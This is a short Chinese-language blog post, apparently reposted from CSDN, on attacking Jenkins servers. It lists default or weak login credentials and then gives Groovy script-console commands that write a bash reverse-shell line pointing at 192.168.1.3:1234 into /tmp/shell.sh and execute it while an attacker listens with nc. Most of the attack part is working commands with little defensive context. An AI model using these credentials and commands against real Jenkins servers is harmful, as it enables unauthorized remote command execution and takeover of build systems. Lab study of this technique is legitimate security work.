web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

2024/10/25 15:28:01 来源：https://blog.csdn.net/Alsn86/article/details/139888888 浏览: 次关键词：web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

Jenkins弱口令

默认用户一般为jenkins/jenkins
在这里插入图片描述

使用admin/admin123登陆成功

Jenkins反弹shell

在这里插入图片描述

格式为 println"命令".execute().text

在/tmp目录中生成shell.sh文件，并向其中写入反弹shell的语句
new File(“/tmp/shell.sh”).write(‘bash -i >& /dev/tcp/192.168.1.3/1234 0>&1’

println “ls-al/tmp/shell.sh”.execute().text
在这里插入图片描述
攻击机nc监听1234端口，使用sh命令执行服务器上的脚本进行反弹shell，println"sh/tmp/shell.sh".execute().text

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com

热文排行

热搜词

Vue3结合vue-plugin-hiprint实现自定义打印模板设计与布局你真的知道TCP协议中的序列号确认、上层协议及记录标识问题吗？异次元v4.0 Adam优化器算法详解 AI视听新体验！浙大阿里提出视频到音乐生成模型MuVi:可解决语义对齐和节奏同步问题【LeetCode】修炼之路-0006-Zigzag Conversion （Z 字形变换）【python】

web中间件漏洞-Jenkins漏洞-弱口令、反弹shell